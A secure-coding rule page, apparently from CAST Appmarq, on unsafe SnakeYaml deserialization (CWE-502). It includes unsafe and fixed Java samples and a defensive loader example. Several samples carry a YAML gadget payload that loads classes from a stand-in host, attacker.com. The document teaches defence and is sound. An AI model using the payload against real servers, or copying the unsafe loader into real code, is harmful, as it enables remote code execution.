CRITICAL
Rule Definition
When user-controlled YAML streams are deserialized, attackers may be able to execute arbitrary code on the server, abuse the application's logic, or cause a denial of service.
YAML serialization libraries convert object graphs into YAML-formatted data, which may include the metadata needed to reconstruct the objects from the YAML stream. If attackers can specify the classes of the objects to be reconstructed and force the application to run arbitrary setters with user-controlled data, they may be able to execute arbitrary code during deserialization of the YAML stream.
SnakeYaml is a widely used YAML parser written in Java. A lesser-known feature of SnakeYaml is its support for a special tag syntax that allows the constructor of any Java class to be called when parsing YAML data.
Remediation
Always make sure to use only a Yaml instance that is constructed either with a SafeConstructor
Violation Code Sample
package yaml;

import org.yaml.snakeyaml.Yaml;

public class Violation {
    public static void main(String[] args) {
        String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
            + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
        Yaml yaml = new Yaml(); // Unsafe instance of Yaml that allows any constructor to be called.
        Object obj = yaml.load(malicious); // Make request to http://attacker.com
    }
}
Fixed Code Sample
package yaml;

import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class Fixed {
    public static void main(String[] args) {
        String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
            + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
        Yaml yaml = new Yaml(new SafeConstructor()); // using safe constructor
        // or restrict construction to the application's own type (SafeClass is a placeholder):
        // Yaml yaml = new Yaml(new Constructor(SafeClass.class));
        Object obj = yaml.load(malicious); // No request to http://attacker.com: the unknown tag is rejected with a ConstructorException
    }
}
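The following is an added example, not part of the rule page or of SnakeYaml itself, showing how an application would wrap the SafeConstructor remediation into a loader for untrusted input: it rejects any tag that names a Java class, caps alias expansion (the denial-of-service case mentioned above), and accepts only the map shape the application expects. It assumes the SnakeYaml 2.x constructor signature SafeConstructor(LoaderOptions); the class name UntrustedYamlLoader and both input strings are constructed for this example.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

public class UntrustedYamlLoader {
    // Constructed sample: the same tagged payload shape the rule describes.
    static final String TAGGED_INPUT =
        "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
        + "[[!!java.net.URL [\"http://attacker.com\"]]]]";
    // Constructed sample: the plain data the application actually expects.
    static final String PLAIN_INPUT = "name: demo\nretries: 3\n";

    // Builds a Yaml instance that only constructs the standard YAML types
    // (maps, lists, strings, numbers, ...) and caps alias expansion so a
    // small document cannot be expanded into a huge object graph.
    static Yaml safeYaml() {
        LoaderOptions opts = new LoaderOptions();
        opts.setMaxAliasesForCollections(10);
        return new Yaml(new SafeConstructor(opts));
    }

    // Returns the parsed map, or null when the document was rejected.
    static Map<String, Object> loadUntrusted(String input) {
        try {
            Object obj = safeYaml().load(input);
            if (obj instanceof Map) {
                @SuppressWarnings("unchecked")
                Map<String, Object> m = (Map<String, Object>) obj;
                return m;
            }
            return null; // parsed fine, but not the shape we expect
        } catch (YAMLException e) {
            // SafeConstructor throws a ConstructorException (a YAMLException) for
            // any !!tag naming a Java class; nothing is instantiated before that.
            System.err.println("rejected YAML document: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        // The tagged document is rejected before any class is constructed;
        // the plain document is returned as a map.
        System.out.println(loadUntrusted(TAGGED_INPUT));
        System.out.println(loadUntrusted(PLAIN_INPUT));
    }
}
```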
Reference
https://cwe.mitre.org/data/definitions/502.html
https://www.baeldung.com/java-snake-yaml
Related Technologies
Technical Criterion
CWE-502 - Deserialization of Untrusted Data
About CAST Appmarq
CAST Appmarq is by far the biggest repository of data about real IT systems. It's built on thousands of analyzed applications, made of 35 different technologies, by over 300 business organizations across major verticals. It provides IT Leaders with factual key analytics to let them know if their applications are on track.